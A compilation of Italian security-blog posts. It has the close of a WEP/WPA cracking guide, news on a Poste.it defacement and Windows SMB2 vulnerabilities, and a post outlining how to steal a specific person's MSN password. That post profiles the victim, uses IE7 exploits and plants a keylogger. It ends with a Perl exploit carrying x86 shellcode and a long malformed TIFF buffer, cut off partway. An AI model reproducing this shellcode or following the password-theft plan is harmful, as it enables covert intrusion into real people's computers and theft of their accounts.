Ovviamente questo testo non ha pretese di esaustività nel trattare la materia del cracking di una rete senza fili: esistono, infatti, tecniche più sofisticate che sfruttano altri tipi di vulnerabilità ma di più difficile applicazione. Di contro sono veramente pochi gli utenti in grado di utilizzare metodi differenti da quelli qui descritti.

Negli ultimi tempi sono stati sviluppati sistemi software che velocizzano il numero di operazioni effettuabili nell’arco di tempo in un attacco: i più interessanti sfruttano i velocissimi processori grafici, molto adatti per fare calcoli di questa natura, oppure sono basati sulla programmazione distribuita (il calcolo viene affidato non a una sola macchina ma ad una rete di calcolatori). Questo genere di innovazioni può minare anche la sicurezza delle password più sofisticate e di lunghezza medio-alta.

Per proteggersi dal WEP, pare scontato che l’unica soluzione sia non usarlo. Il WEP non è mai sicuro, e il cracking risulta facile qualsiasi sia la passphrase impiegata.
Il WPA-PSK offre protezione buona a patto che la password sia sufficientemente lunga, composta da vari tipi di caratteri (maiuscole/minuscole/numeri/caratteri speciali) e non sia una parola potenzialmente presente nel dizionario. La sicurezza cresce esponenzialmente con ogni carattere in più aggiunto alla password!
In ogni caso, quando possibile, il sistema migliore è certamente passare a WPA2-AES oppure, soluzione consigliata in ambito professionale, dotarsi di un server di autenticazione, ad esempio un server RADIUS.

Fonte mr webmaster

Sotto attacco il sito delle Poste italiane. Pirati informatici ne hanno alterato l’homepage, scrivendoci una propria nota in italiano, dove dichiarano perché l’hanno fatto: per dimostrare quanto siano deboli le protezioni di Poste e così allarmare i correntisti sulla sicurezza dei loro dati.

Poste smentisce che questi siano mai stati in pericolo, tuttavia. Alle 20.20 di sabato sera, l’attacco: il sito di Poste.it è stato sfregiato dai pirati. Dopo 30 minuti i responsabili se ne sono accorti e hanno messo il sito offline, rendendolo quindi non più raggiungibile dagli utenti.

Sul sito campeggiava una grande scritta, “hacked”, e una nota scritta dai due presunti hacker, che si sono firmati Mr. Hipo e StutM. “Perché questo atto di forza? Per dimostrare a milioni di italiani che i loro dati sensibili non sono al sicuro! Sembra pazzesco – si legge – eppure tutta la sicurezza garantita nei servizi online di e-commerce è solamente apparente”, era scritto nella nota. “Per vostra fortuna noi siamo persone non malintenzionate, perciò i vostri dati e i vostri accounts non sono stati toccati; ma cosa succederebbe – si legge ancora – se un giorno arrivasse qualcuno con intenzioni ben peggiori delle nostre?”.

“Con questo gesto quindi – continua la nota – invitiamo i responsabili a occuparsi della grave mancanza di sicurezza nei servizi online delle Poste s.p.a.”. I responsabili però minimizzano. “È solo un ‘defacement’ che riguarda il sito informativo di Poste.it. Non sono stati violati i server con i dati personali degli utenti, che quindi non sono mai stati in pericolo” dice a Repubblica.it Gerardo Costabile, responsabile Sicurezza Logica, Poste Italiane.

Il defacement è un’azione dimostrativa abbastanza comune, che consiste nello sfregiare un sito. Al solito, per riuscirci, i pirati sfruttano bug ed errori sul server che regge il sito. “Ancora non sappiamo come l’hanno fatto. Lo sapremo entro domani mattina, probabilmente. Adesso la polizia postale è nei nostri datacenter per le indagini sul caso”, aggiunge. “I defacement comunque sono un fenomeno abbastanza fisiologico su internet, se ne contano circa mille all’anno solo in Italia”.

Vero è che, negli anni, i pirati hanno colpito così siti di varie levature, anche istituzionali. Nel 2006 è capitato persino al ministero della Difesa. “Questa volta fa rumore perché si tratta di Poste e perché i pirati lanciano un’accusa in italiano”, aggiunge. Questo dettaglio in effetti è inusuale. Di solito i defacement sono neutri (semplicemente i pirati fanno vedere quanto sono bravi e scrivono in inglese); stavolta hanno voluto invece gettare fango direttamente sulla reputazione di Poste. Aspetti che potrebbero indirizzare le indagini verso i responsabili.

Fonte Repubblica.it

Un esperto di sicurezza ha pubblicato un exploit per una recente vulnerabilità di Windows Vista. Potrebbe essere utilizzato per eseguire del codice a distanza. Microsoft sta ultimando una patch

Roma – A rendere più urgente la correzione di un recente bug di Windows relativo al protocollo di rete Server Message Block (SMB) 2 è stata la divulgazione, negli scorsi giorni, di un nuovo exploit pubblico utilizzabile per eseguire codice sui PC in cui girano Windows Vista, Windows Server 2008 e le versioni di Windows 7 precedenti alla RTM.

Ad allarmare gli esperti c’è il fatto che il nuovo exploit, scritto dal ricercatore Stephen Fewer di Harmony Security, è stato inserito in Metasploit, un toolkit open source per il penetration testing utilizzato di frequente anche per fini poco leciti.

Microsoft è a conoscenza del problema da circa un mese e sebbene non abbia ancora rilasciato una patch ha messo a disposizione degli utenti un workaround automatizzato: per applicarlo è sufficiente visitare questa pagina e cliccare sul pulsante Fix it di sinistra, il quale provvede a disattivare SMB 2. Per riattivare questo componente, preferibilmente dopo aver applicato la relativa patch (in via di sviluppo), basterà cliccare sul pulsante Fix it di destra.

La falla, relativa all’implementazione del protocollo SMB 2, è stata scoperta lo scorso mese dall’esperto di sicurezza Laurent Gaffié, il quale pubblicò anche un exploit proof of concept: tale codice era però soltanto dimostrativo, e non poteva essere utilizzato direttamente per lanciare degli attacchi. Nonostante ciò, ai ricercatori di sicurezza non è occorso molto tempo per mettere a punto i primi exploit funzionanti: fino ad oggi il loro codice è circolato però soprattutto in forma privata, e poteva essere utilizzato solo per attacchi di denial of service.

Fewer sostiene che il suo exploit può essere utilizzato anche per l’esecuzione di codice a distanza, e per installare sui PC delle vittime backdoor o malware. L’efficacia del programma è stata però messa in dubbio da Kostya Kortchinsky, ricercatore senior presso la società Immunity, il quale afferma di essere riuscito ad eseguire del codice per mezzo dell’exploit di Fewer esclusivamente all’interno di una macchina virtuale VMware: al di fuori dell’ambiente di virtualizzazione il codice di Fewer causerebbe soltanto il crash del sistema.

Microsoft dovrebbe correggere definitivamente la falla con il rilascio dei prossimi bollettini di sicurezza, previsti per il 13 ottobre.

Come si è detto, BigM ha già fornito una soluzione temporanea al problema servendosi di uno script Fix it, una forma di workaround introdotta circa sei mesi fa e, da allora, utilizzata in oltre 300 occasioni per risolvere problemi, modificare le configurazioni di Windows o proteggere gli utenti da certi virus. Microsoft afferma che in oltre il 95% dei casi il pulsante Fix it “ha completamente risolto il problema”.

Fonte Punto-Informatico

Oggi un mio amico mi ha sottoposto un quesito veramente singolare. Deve recuperare la password di MSN Messenger da un computer remoto (cioè che non ha la possibilità di accedervi fisicamente). Logicamente non può usare il ripristino della password perché non ricorda la domanda segreta e poi perché non vuole cambiarla, gli serve conoscere la password attuale. Bhe… Non è che sia una cosa così semplice, ma scervellandosi un po ci si può riuscire…

Ipotesi di strategia

Dato che si tratta di un’operazione abbastanza complicata e altrettanto illecita, si possono fare soltanto delle supposizioni su come procedere, dei pensieri, delle fantasie su come arrivare all’obiettivo. Se si volesse usare una soluzione fantasiosa si potrebbe sfruttare un bug del sistema operativo o di qualche altro programma installato per installare un sistema di controllo remoto, oppure, un semplice Keylogger. Così facendo quando la vittima (da ora in poi Alice) accede al servizio di MSN intercetteremo la password.
Necessariamente dobbiamo organizzare il nostro attacco in vari punti:

• raccogliere informazioni sul sistema da attaccare;
• tutto su Alice: le abitudini, conoscenze informatiche, il che software usa, come e quanto, se aggiorna il software, ecc.;
• che tipo di bug potremmo sfruttare: quello che ci permette le maggiori garanzie di successo;
• test delle soluzioni su un sistema costruito per l’occasione;
• exec

Fondamentale è scoprire che tipo di computer e sistema ha Alice. Dalle informazioni che mi ha dato Bob (il mio amico) il sistema è Windows Xp versione pirata, quindi, Alice difficilmente potrà fare gli aggiornamenti (grazie Microsoft). Sappiamo che Alice usa MSN ma non abbiamo informazioni sulla versione. Non si sa che Browser usi e che tipo di antivirus abbia. Tutte queste informazioni non le possediamo, e quindi, bisogna fare ricorso a un vecchio trucco: basta preparare una pagina html con un servizio di analisi dei visitatori (ne esistono a migliaia e gratuiti) e dobbiamo fare in modo che la nostra Alice (e solo lei) veda la pagina, si potrebbe fare ugualmente con una mail in formato html, ma difficilmente si ottiene qualcosa.

Dalle nostre analisi risulta che Alice usa Internet Explor 7, e questo è già sufficiente in quanto a luglio è stata scoperta una vulnerabilità di cui si dispone di un exploit (è anche vero che si potrebbero usare i bug presenti nel bollettino di ieri, ma dato che non sono presenti degli exploit già pronti non verrano presi in considerazioni). Si può usare questo exploit oppure questo (logicamente ci sono errori voluti in alcuni punti del software, sta nella vostra bravura trovarli, non mi va che un ragazzetto malintenzionato faccia copia e incolla… poi il responsabile sono io???). Oppure si potrebbe usare questo, molto particolare, solo che bisogna chattare con l’altra persona per utilizzarlo. Un’altra cosa da notare è che gli script segnalati fanno partire la calcolatrice di win, giusto per evitare che i soliti malintenzionati facciano danni. Questi script per esserci utili hanno bisogno di alcune modifiche, al posto della calcolatrice dovrebbero far partire altro o installare qualche altro programma a noi utile.

Preparato il nostro exploit, dopo aver testato l’effettivo funzionamento, bisogna farlo arrivare ad Alice, e qua si apre un altro mondo di strategie, ci stanno migliaia di metodi ma questi non fanno parte del nostro discorso. Se tutto ok il gioco è fatto.

Fine

Saluti Arturu.it

Ps se qualcuno ancora si sta domandando: ma la password come la trovo? significa che è meglio lasciar stare ste cose, basta un pò di spirito di osservazione…

Cinque bollettini di sicurezza, tutti critici, e un advisory nel quale si conferma l’esistenza di una vulnerabilità zero-day. Salva la versione finale di Seven, problemi per le release candidate e Vista

Roma – Nella tarda serata di ieri Microsoft ha pubblicato cinque bollettini di sicurezza, tutti classificati con il massimo grado di rischio e tutti relativi a vulnerabilità che, almeno potenzialmente, potrebbero essere sfruttate da malintenzionati per eseguire del codice a distanza. BigM ha anche pubblicato un advisory in cui prende atto dell’esistenza di una vulnerabilità zero-day in Windows Vista.

Come previsto, la recente vulnerabilità zero-day nel servizio FTP di Internet Information Services rimane aperta: Microsoft sta ancora testando la relativa patch, che conta di distribuire non appena possibile out-of-band, ossia fuori dal suo tradizionale ciclo mensile. Nel frattempo il big di Redmond invita i propri utenti a consultare questo advisory, dove fornisce alcune soluzioni temporanee al problema.

Tutte le vulnerabilità descritte nei nuovi bollettini di sicurezza riguardano versioni di Windows precedenti alla 7, e sono causate da bug contenuti nel motore JScript (MS09-045), nel Wireless LAN AutoConfig Service (MS09-049), nel formato Windows Media (MS09-047), nell’implementazione del protocollo TCP/IP (MS09-048) e nel controllo ActiveX DHTML Editing Component (MS09-046).

Sul blog del Microsoft Security Response Center (MSRC) si evidenzia come le debolezze contemplate nei bollettini MS09-045, MS09-046 e MS09-047 possano essere sfruttate inducendo un utente a visitare una pagina web maligna, mentre quelle corrette nei bollettini MS09-048 e MS09-049 sono potenzialmente innescabili da attacchi diretti via rete tesi ad eseguire del codice a distanza o creare condizioni di denial of service.

Microsoft ritiene che le patch da applicare con più urgenza siano quelle relative alle vulnerabilità del motore JScript e del formato Windows Media: in entrambi i casi la probabilità che i cracker riescano a sfruttare queste falle è assai elevata. Gli scenari di attacco sono piuttosto classici: una pagina web contenente uno script maligno o un file Windows Media appositamente creato per innescare il bug ed eseguire del codice con gli stessi privilegi dell’utente locale. Le versioni di Windows interessate sono tutte quelle attualmente supportate (tranne Seven).

La seconda falla più urgente è quella legata al controllo ActiveX DHTML Editing Component, che Microsoft afferma non essere in alcun modo legata a quella dell’Active Template Library. In questo caso gli utenti a rischio sono quelli di Windows 2000, XP e Server 2003.

Il problema relativo al servizio di autoconfigurazione del Wireless riguarda invece Windows Vista e Windows Server 2008 e, sebbene potenzialmente serio, Microsoft sostiene sia piuttosto difficile da sfruttare per via delle protezioni contenute nei suoi più recenti sistemi operativi.

Delle tre vulnerabilità relative allo stack TCP/IP, una interessa Windows Vista e Windows Server 2008 e potrebbe essere sfruttata per eseguire codice in modalità remota. Le altre due falle possono essere utilizzate per lanciare attacchi di denial of service contro sistemi su cui giri Windows 2000: in questo caso Microsoft afferma che, a causa dell’architettura stessa del componente TCP/IP di Windows 2000, non è possibile risolvere il problema mediante un semplice aggiornamento. Per tale ragione BigM invita i clienti che non posso migrare ad una versione più recente di Windows Server di configurare attentamente il proprio firewall.

Il blog sulla sicurezza Threatpost spiega che le patch relative al TCP/IP appena rilasciate da Microsoft e da Cisco risolvono alcuni problemi scoperti circa un anno fa in molte implementazioni del celebre protocollo di Internet.

Microsoft ha infine aggiornato il bollettino MS09-037 relativo alla famosa e già citata vulnerabilità Active Template Library (ATL). Il motivo dell’update è da ricercare nella scoperta di una falla correlata a quella ATL e contenuta in un altro controllo ActiveX contenuto in Windows XP Media Center 2005 e in Windows Vista.

Una tabella sinottica dei bollettini di settembre è stata pubblicata qui dall’Internet Storm Center.

Security Advisory 975497
Nella giornata di ieri Microsoft ha anche pubblicato un advisory di sicurezza che conferma l’esistenza di una vulnerabilità zero-day legata al protocollo SMB 2.0 in alcune recenti versioni di Windows. A differenza di quanto riportato dallo scopritore della falla, l’esperto di sicurezza Laurent Gaffié, Microsoft afferma che il problema interessa esclusivamente Windows Vista, Windows Server 2008 e Windows 7 RC, ma non la versione finale (RTM) di Seven.

BigM ha criticato Gaffié per aver “irresponsabilmente” divulgato i dettagli della falla prima che questa venisse corretta. Sebbene il ricercatore abbia anche pubblicato un exploit proof of concept, Microsoft afferma che al momento non è al corrente di attacchi che sfruttino la debolezza.

Il problema è causato da un bug nell’implementazione del protocollo System Message Block (SMB) Version 2, che si trova esclusivamente in Vista, Seven e Server 2008. La precedente versione di SMB alla base di XP e 2000 non è vulnerabile.

The Inquirer sostiene che quello appena corretto sia lo stesso bug che Microsoft corresse anni or sono in Windows 2000 e XP, e che per qualche ragione ha poi re-intrdotto in Vista. La debolezza può essere sfruttata inviando dei pacchetti malformati verso la porta 445 di un sistema vulnerabile e innescando un cosiddetto Blue Screen of Death, ossia un errore irreversibile di sistema. Questo tipo di attacco, secondo Gaffié, funziona sia con la versione a 32 bit che con quella a 64 bit di Vista.

In attesa di rilasciare una patch, Microsoft suggerisce ai propri utenti di disattivare SMB e bloccare nel firewall le porte 139 e 445.

SMB è un protocollo di rete che consente a Windows di condividere file, directory e dispositivi. SMB2 è un aggiornamento del protocollo originale che, tra le altre cose, ottimizza la comunicazione tra client e server.

Fonte: Punto Informatico

Salve a tutti i lettori, è molto che non scrivo, per motivi di lavoro non sono riuscito a dedicarmi molto al sito. Però, questa volta, la notizia è talmente allettante che non ce la faccio proprio a non pubblicarla…

#!/usr/bin/perl
#
#Il codice di esempio fa partire il programma calc.exe
#

use strict;

# run calc.exe
my $shellcode =
“\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b”.
“\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99″.
“\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04″.
“\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb”.
“\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30″.
“\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09″.
“\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8″.
“\x83\xc0\x7b\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff”.
“\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00″;

my $tiff1 =
“\x49\x49\x2A\x00\x90\x3E\x00\x00\x80\x3F\xE0\x50″.
“\x38\x24\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36″.
“\x1D\x0F\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C”.
“\x46\x63\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52″.
“\x39\x24\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6″.
“\x5D\x2F\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C”.
“\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54″.
“\x3A\x25\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36″.
“\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC”.
“\x56\x6B\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56″.
“\x3B\x25\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6″.
“\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC”.
“\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58″.
“\x3C\x26\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37″.
“\x1D\x8F\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96″.
“\x40\x40\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84″.
“\x42\x61\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51″.
“\x38\xA4\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76″.
“\x3D\x1F\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94″.
“\x4A\x65\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53″.
“\x39\xA4\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6″.
“\x7D\x3F\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4″.
“\x52\x69\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55″.
“\x3A\xA5\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76″.
“\xBD\x5F\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4″.
“\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57″.
“\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6″.
“\xFD\x7F\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4″.
“\x62\x71\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59″.
“\x3C\xA6\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50″.
“\x38\x24\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36″.
“\x1D\x0F\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C”.
“\x46\x63\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52″.
“\x39\x24\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6″.
“\x5D\x2F\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C”.
“\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54″.
“\x3A\x25\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36″.
“\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC”.
“\x56\x6B\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56″.
“\x3B\x25\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6″.
“\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC”.
“\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58″.
“\x3C\x26\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37″.
“\x1D\x8F\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96″.
“\x40\x40\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84″.
“\x42\x61\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51″.
“\x38\xA4\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76″.
“\x3D\x1F\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94″.
“\x4A\x65\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53″.
“\x39\xA4\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6″.
“\x7D\x3F\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4″.
“\x52\x69\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55″.
“\x3A\xA5\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76″.
“\xBD\x5F\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4″.
“\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57″.
“\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6″.
“\xFD\x7F\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4″.
“\x62\x71\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59″.
“\x3C\xA6\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50″.
“\x38\x24\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36″.
“\x1D\x0F\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C”.
“\x46\x63\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52″.
“\x39\x24\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6″.
“\x5D\x2F\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C”.
“\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54″.
“\x3A\x25\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36″.
“\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC”.
“\x56\x6B\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56″.
“\x3B\x25\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6″.
“\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC”.
“\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58″.
“\x3C\x26\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37″.
“\x1D\x8F\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96″.
“\x40\x40\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84″.
“\x42\x61\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51″.
“\x38\xA4\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76″.
“\x3D\x1F\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94″.
“\x4A\x65\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53″.
“\x39\xA4\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6″.
“\x7D\x3F\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4″.
“\x52\x69\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55″.
“\x3A\xA5\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76″.
“\xBD\x5F\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4″.
“\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57″.
“\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6″.
“\xFD\x7F\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4″.
“\x62\x71\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59″.
“\x3C\xA6\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50″.
“\x38\x24\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36″.
“\x1D\x0F\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C”.
“\x46\x63\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52″.
“\x39\x24\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6″.
“\x5D\x2F\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C”.
“\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54″.
“\x3A\x25\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36″.
“\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC”.
“\x56\x6B\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56″.
“\x3B\x25\x96\xCD\x67\xB4\x5A\x6D\x56\xB9\xE0\x02″.
“\xDD\x6C\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC”.
“\x5E\x6F\x57\xBB\xE5\xF6\xFD\x45\xB7\x00\x2F\xF8″.
“\x3C\x26\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37″.
“\x1D\x8F\xAD\x60\x72\x19\x3C\xA6\x57\x2D\x97\xCC”.
“\x66\x73\x59\xBC\xE6\x76\xF1\x01\x80\x3F\xE0\x50″.
“\x38\x24\x16\x0D\x07\x84\x42\x61\x50\xB8\x60\x02″.
“\x1D\x0C\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C”.
“\x46\x63\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52″.
“\x39\x24\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6″.
“\x5D\x2F\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C”.
“\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x64\x90″.
“\xE0\x05\x0A\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36″.
“\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC”.
“\x56\x6B\x55\xBA\xE5\x76\x5B\x44\xAF\x58\x6C\x56″.
“\x3B\x25\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6″.
“\xDD\x6F\xB8\x5C\x6E\x55\x3B\x05\xCE\xED\x77\xBC”.
“\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58″.
“\x3C\x25\x76\xEB\x85\xC4\x62\x71\x58\xBC\x66\x37″.
“\x1D\x8F\xC8\x64\x72\x59\x3C\xA5\xBB\x0F\x95\xCC”.
“\x66\x73\x59\xBC\xE6\x77\x3D\x9F\xD0\x68\x74\x57″.
“\xF8\x08\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84″.
“\x42\x61\x50\xB8\x64\x30\x01\x0F\x86\xC4\x62\x51″.
“\x38\xA4\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76″.
“\x3D\x1F\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94″.
“\x4A\x65\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53″.
“\x39\xA4\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6″.
“\x7D\x3F\xA0\x50\x66\x10\xF0\x05\x0A\x8D\x47\xA4″.
“\x52\x69\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55″.
“\x3A\xA5\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76″.
“\x5B\x44\xAF\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4″.
“\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x55″.
“\x3B\x05\xCE\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6″.
“\xFD\x7F\xC0\x60\x70\x58\x3C\x25\x6A\xEB\x85\xC4″.
“\x62\x71\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59″.
“\x3C\xA5\xC7\x0F\x95\xCC\x66\x73\x59\xBC\xE6\x77″.
“\x3D\x9F\xD0\x68\x74\x57\x18\x08\x80\x3F\xE0\x50″.
“\x38\x24\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36″.
“\x10\x00\x88\x43\xA2\x51\x38\xA4\x56\x2D\x17\x8C”.
“\x46\x63\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52″.
“\x39\x24\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6″.
“\x5D\x2F\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C”.
“\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x67\xB1″.
“\x00\x05\x0A\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36″.
“\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC”.
“\x56\x6B\x55\xBA\xE5\x76\x5B\x44\xAF\x58\x6C\x56″.
“\x3B\x25\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6″.
“\xDD\x6F\xB8\x5C\x6E\x55\x3B\x05\xCE\xED\x77\xBC”.
“\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58″.
“\x3C\x25\x76\x89\x75\xC2\xD5\x70\xF8\xBC\x66\x37″.
“\x1D\x8F\xC8\x64\x71\xF8\x9C\xA6\x57\x2D\x97\xCC”.
“\x66\x73\x59\xBC\xE6\x77\x3D\x65\xC4\x67\xE5\x39″.
“\x2C\x95\x2F\x43\xA2\xD4\x6A\x75\x5A\xBD\x66\xB7″.
“\x5D\xAF\xD8\x5E\x60\x20\x80\x3F\xE0\x50\x38\x24″.
“\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36\x1D\x0C”.
“\x00\x44\x62\x51\x28\x7C\x56\x2D\x17\x8C\x46\x63″.
“\x51\xA8\x9C\x76\x3D\x1E\x8D\xC8\x64\x52\x28\xA4″.
“\x8E\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6\x5D\x2F”.
“\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C\x4E\x67″.
“\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54\x3A\x25″.
“\x16\x8D\x47\xA4\x52\x69\x50\x29\x2D\x2E\x93\x1F”.
“\xA8\x53\x69\xD3\xEA\x95\x4E\xAD\x57\xAC\x56\x6B”.
“\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56\x3B\x25″.
